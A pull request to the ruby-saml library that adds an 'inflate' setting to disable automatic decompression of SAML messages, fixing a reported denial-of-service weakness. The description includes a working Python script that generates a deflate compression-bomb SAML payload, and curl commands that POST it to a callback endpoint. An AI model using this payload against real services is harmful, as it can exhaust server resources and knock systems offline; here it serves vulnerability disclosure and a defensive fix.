### PR TITLE
Introduce inflate option to disable SAML message inflation

### DIFF
--- a/lib/onelogin/ruby-saml/logoutresponse.rb
+++ b/lib/onelogin/ruby-saml/logoutresponse.rb
@@ -24,7 +24,7 @@ module OneLogin
       # Constructs the Logout Response. A Logout Response Object that is an extension of the SamlMessage class.
       # @param response  [String] A UUEncoded logout response from the IdP.
       # @param settings  [OneLogin::RubySaml::Settings|nil] Toolkit settings
-      # @param options   [Hash] Extra parameters. 
+      # @param options   [Hash] Extra parameters.
       #                    :matches_request_id It will validate that the logout response matches the ID of the request.
       #                    :get_params GET Parameters, including the SAMLResponse
       # @raise [ArgumentError] if response is nil
@@ -41,14 +41,14 @@ module OneLogin
         end
 
         @options = options
-        @response = decode_raw_saml(response)
+        @response = decode_raw_saml(response, settings || ::OneLogin::RubySaml::Settings.new)
         @document = XMLSecurity::SignedDocument.new(@response)
       end
 
       # Checks if the Status has the "Success" code
       # @return [Boolean] True if the StatusCode is Sucess
       # @raise [ValidationError] if soft == false and validation fails
-      # 
+      #
       def success?
         unless status_code == "urn:oasis:names:tc:SAML:2.0:status:Success"
           return append_error("Bad status code. Expected <urn:oasis:names:tc:SAML:2.0:status:Success>, but was: <#@status_code>")
@@ -144,7 +144,7 @@ module OneLogin
 
       # Validates the Logout Response against the specified schema.
       # @return [Boolean] True if the XML is valid, otherwise False if soft=True
-      # @raise [ValidationError] if soft == false and validation fails 
+      # @raise [ValidationError] if soft == false and validation fails
       #
       def validate_structure
         unless valid_saml?(document, soft)
@@ -203,13 +203,13 @@ module OneLogin
       # Validates the Signature if it exists and the GET parameters are provided
       # @return [Boolean] True if not contains a Signature or if the Signature is valid, otherwise False if soft=True
       # @raise [ValidationError] if soft == false and validation fails
-      #      
+      #
       def validate_signature
         return true unless !options.nil?
         return true unless options.has_key? :get_params
         return true unless options[:get_params].has_key? 'Signature'
         return true if settings.nil? || settings.get_idp_cert.nil?
-        
+
         query_string = OneLogin::RubySaml::Utils.build_query(
           :type        => 'SAMLResponse',
           :data        => options[:get_params]['SAMLResponse'],
@@ -228,7 +228,7 @@ module OneLogin
           error_msg = "Invalid Signature on Logout Response"
           return append_error(error_msg)
         end
-        true        
+        true
       end
 
     end

--- a/lib/onelogin/ruby-saml/response.rb
+++ b/lib/onelogin/ruby-saml/response.rb
@@ -32,7 +32,7 @@ module OneLogin
 
       # Constructs the SAML Response. A Response Object that is an extension of the SamlMessage class.
       # @param response [String] A UUEncoded SAML response from the IdP.
-      # @param options  [Hash]   :settings to provide the OneLogin::RubySaml::Settings object 
+      # @param options  [Hash]   :settings to provide the OneLogin::RubySaml::Settings object
       #                          Or some options for the response validation process like skip the conditions validation
       #                          with the :skip_conditions, or allow a clock_drift when checking dates with :allowed_clock_drift
       #                          or :matches_request_id that will validate that the response matches the ID of the request,
@@ -50,7 +50,7 @@ module OneLogin
           end
         end
 
-        @response = decode_raw_saml(response)
+        @response = decode_raw_saml(response, @settings || ::OneLogin::RubySaml::Settings.new)
         @document = XMLSecurity::SignedDocument.new(@response, @errors)
 
         if assertion_encrypted?
@@ -189,7 +189,7 @@ module OneLogin
 
       # Checks if the Status has the "Success" code
       # @return [Boolean] True if the StatusCode is Sucess
-      # 
+      #
       def success?
         status_code == "urn:oasis:names:tc:SAML:2.0:status:Success"
       end
@@ -376,7 +376,7 @@ module OneLogin
       #
       def validate_success_status
         return true if success?
-          
+
         error_msg = 'The status code of the Response was not Success'
         status_error_msg = OneLogin::RubySaml::Utils.status_error_msg(error_msg, status_code, status_message)
         append_error(status_error_msg)
@@ -384,7 +384,7 @@ module OneLogin
 
       # Validates the SAML Response against the specified schema.
       # @return [Boolean] True if the XML is valid, otherwise False if soft=True
-      # @raise [ValidationError] if soft == false and validation fails 
+      # @raise [ValidationError] if soft == false and validation fails
       #
       def validate_structure
         structure_error_msg = "Invalid SAML Response. Not match the saml-schema-protocol-2.0.xsd"
@@ -417,7 +417,7 @@ module OneLogin
         true
       end
 
-      # Validates that the SAML Response contains an ID 
+      # Validates that the SAML Response contains an ID
       # If fails, the error is added to the errors array.
       # @return [Boolean] True if the SAML Response contains an ID, otherwise returns False
       #
@@ -706,7 +706,7 @@ module OneLogin
       end
 
       # Validates if exists valid SubjectConfirmation (If the response was initialized with the :allowed_clock_drift option,
-      # timimg validation are relaxed by the allowed_clock_drift value. If the response was initialized with the 
+      # timimg validation are relaxed by the allowed_clock_drift value. If the response was initialized with the
       # :skip_subject_confirmation option, this validation is skipped)
       # If fails, the error is added to the errors array
       # @return [Boolean] True if exists a valid SubjectConfirmation, otherwise False if soft=True
@@ -717,7 +717,7 @@ module OneLogin
         valid_subject_confirmation = false
 
         subject_confirmation_nodes = xpath_from_signed_assertion('/a:Subject/a:SubjectConfirmation')
-        
+
         now = Time.now.utc
         subject_confirmation_nodes.each do |subject_confirmation|
           if subject_confirmation.attributes.include? "Method" and subject_confirmation.attributes['Method'] != 'urn:oasis:names:tc:SAML:2.0:cm:bearer'
@@ -736,7 +736,7 @@ module OneLogin
           next if (attrs.include? "InResponseTo" and attrs['InResponseTo'] != in_response_to) ||
                   (attrs.include? "NotOnOrAfter" and (parse_time(confirmation_data_node, "NotOnOrAfter") + allowed_clock_drift) <= now) ||
                   (attrs.include? "NotBefore" and parse_time(confirmation_data_node, "NotBefore") > (now + allowed_clock_drift))
-          
+
           valid_subject_confirmation = true
           break
         end
@@ -808,7 +808,7 @@ module OneLogin
         opts[:cert] = settings.get_idp_cert
         fingerprint = settings.get_fingerprint
 
-        unless fingerprint && doc.validate_document(fingerprint, @soft, opts)          
+        unless fingerprint && doc.validate_document(fingerprint, @soft, opts)
           return append_error(error_msg)
         end
 

--- a/lib/onelogin/ruby-saml/saml_message.rb
+++ b/lib/onelogin/ruby-saml/saml_message.rb
@@ -63,7 +63,7 @@ module OneLogin
       # @param document [REXML::Document] The message that will be validated
       # @param soft [Boolean] soft Enable or Disable the soft mode (In order to raise exceptions when the message is invalid or not)
       # @return [Boolean] True if the XML is valid, otherwise False, if soft=True
-      # @raise [ValidationError] if soft == false and validation fails 
+      # @raise [ValidationError] if soft == false and validation fails
       #
       def valid_saml?(document, soft = true)
         begin
@@ -87,13 +87,17 @@ module OneLogin
       # @param saml [String] The deflated and encoded SAML Message
       # @return [String] The plain SAML Message
       #
-      def decode_raw_saml(saml)
+      def decode_raw_saml(saml, settings=::OneLogin::RubySaml::Settings.new)
         return saml unless base64_encoded?(saml)
 
         decoded = decode(saml)
-        begin
-          inflate(decoded)
-        rescue
+        if settings.inflate
+          begin
+            inflate(decoded)
+          rescue
+            decoded
+          end
+        else
           decoded
         end
       end

--- a/lib/onelogin/ruby-saml/settings.rb
+++ b/lib/onelogin/ruby-saml/settings.rb
@@ -40,6 +40,7 @@ module OneLogin
       attr_accessor :sessionindex
       attr_accessor :compress_request
       attr_accessor :compress_response
+      attr_accessor :inflate
       attr_accessor :double_quote_xml_attribute_values
       attr_accessor :passive
       attr_accessor :protocol_binding
@@ -94,7 +95,7 @@ module OneLogin
       end
 
       # Setter for Single Logout Service Binding.
-      # 
+      #
       # (Currently we only support "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect")
       # @param url [String]
       #
@@ -150,6 +151,7 @@ module OneLogin
         :idp_cert_fingerprint_algorithm            => XMLSecurity::Document::SHA1,
         :compress_request                          => true,
         :compress_response                         => true,
+        :inflate                                   => true,
         :soft                                      => true,
         :security                                  => {
           :authn_requests_signed      => false,

--- a/lib/onelogin/ruby-saml/slo_logoutrequest.rb
+++ b/lib/onelogin/ruby-saml/slo_logoutrequest.rb
@@ -24,7 +24,7 @@ module OneLogin
 
       # Constructs the Logout Request. A Logout Request Object that is an extension of the SamlMessage class.
       # @param request [String] A UUEncoded Logout Request from the IdP.
-      # @param options [Hash]  :settings to provide the OneLogin::RubySaml::Settings object 
+      # @param options [Hash]  :settings to provide the OneLogin::RubySaml::Settings object
       #                        Or :allowed_clock_drift for the logout request validation process to allow a clock drift when checking dates with
       #
       # @raise [ArgumentError] If Request is nil
@@ -42,7 +42,7 @@ module OneLogin
           end
         end
 
-        @request = decode_raw_saml(request)
+        @request = decode_raw_saml(request, @settings || ::OneLogin::RubySaml::Settings.new)
         @document = REXML::Document.new(@request)
       end
 
@@ -184,7 +184,7 @@ module OneLogin
 
       # Validates the Logout Request against the specified schema.
       # @return [Boolean] True if the XML is valid, otherwise False if soft=True
-      # @raise [ValidationError] if soft == false and validation fails 
+      # @raise [ValidationError] if soft == false and validation fails
       #
       def validate_structure
         unless valid_saml?(document, soft)
@@ -194,7 +194,7 @@ module OneLogin
         true
       end
 
-      # Validates that the Logout Request provided in the initialization is not empty, 
+      # Validates that the Logout Request provided in the initialization is not empty,
       # @return [Boolean] True if the required info is found, otherwise False if soft=True
       # @raise [ValidationError] if soft == false and validation fails
       #


### PR DESCRIPTION
## Issue 

In one of our projects we are using omniauth-saml and ruby-saml to implement
Single Sign-On through SAML. It was brought to our attention by @0ang3el, one of
our security experts, that our app was vulnerable to the following DoS attack
because the SAML callback automatically decompresses SAML responses:

```
Attacker can compress huge XML and pass several requests with compressed XML to
SAML endpoint. Deflate allows the attacker to achieve 1000:1 compression ratio
(10Gb into 10Mb).
```  

I looked into the internals of ruby-saml and found that there was no option to
turn the automatic decompressing off.

### Evidence

I reproduce below the evidence @0ang3el provided for this vulnerability:

1. You can use this Python script to produce DoS payload.

```Python
import zlib
import StringIO
import base64
import sys
import urllib

d = 	{
		"K"	: 1024,
		"M"	: 1024*1024,
		"G"	: 1024*1024*1024
	}

num = int(sys.argv[1])
measure = d.get(sys.argv[2],1024)
outfile = "/tmp/bomb.txt"

def gzip_encode(str):
    return zlib.compress(str)[2:-4]

prefix= """<?xml version="1.0" encoding="UTF-8"?>
<samlp:LogoutRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="ONELOGIN_21df91a89767879fc0f7df6a1490c6000c81644d" Version="2.0" IssueInstant="2014-07-18T01:13:06Z" Destination="http://idp.example.com/SingleLogoutService.php">
  <saml:Issuer>"""
suffix= """</saml:Issuer>
  <saml:NameID SPNameQualifier="http://sp.example.com/demo1/metadata.php" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">ONELOGIN_f92cc1834efc0f73e9c09f482fce80037a6251e7</saml:NameID>
</samlp:LogoutRequest>"""

data = prefix + "A" * (num * measure) + suffix

with open(outfile,"w") as f:
	f.write( "SAMLResponse=" + urllib.quote(base64.b64encode(gzip_encode(data))) )
```
2. Produce 100K payload and issue POST request to the SAML callback endpoint
(here we will use https://example.com/auth/saml/callback). You will get quick
HTTP 302 response.

```
python gzip_bomb.py 100 K

curl -i -s -k  -X $'POST' \
    -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H $'Content-Type: application/x-www-form-urlencoded' \
    --data-binary "@/tmp/bomb.txt" \
    $'https://example.com/auth/saml/callback'
```

3. Produce 100M (or 1G) payload and issue POST request to the SAML callback
endpoint. After one minute you will get HTTP 500 response.

```
python gzip_bomb.py 100 M

curl -i -s -k  -X $'POST' \
    -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H $'Content-Type: application/x-www-form-urlencoded' \
    --data-binary "@/tmp/bomb.txt" \
    $'https://example.com/auth/saml/callback'
```

## Fix

I have added a new _inflate_ option to OneLogin::RubySaml::Settings. I have
set it to default to true thinking of backward-compatibility for scenarios
currently relaying on SAML response inflation.

I have modified OneLogin::RubySaml::SamlMessage#decode_raw_saml to accept an
optional settings parameter, and to attempt inflation only if the received
settings has the _inflate_ option set to true.

I have modified the following to use the received settings (if any) on the call
to #decode_raw_saml on initialization:
- OneLogin::RubySaml::Logoutresponse
- OneLogin::RubySaml::Response
- OneLogin::RubySaml::SloLogoutrequest

Regarding tests, I have added tests for the non-inflation scenario for
OneLogin::RubySaml::SamlMessage#decode_raw_saml to keep coverage.
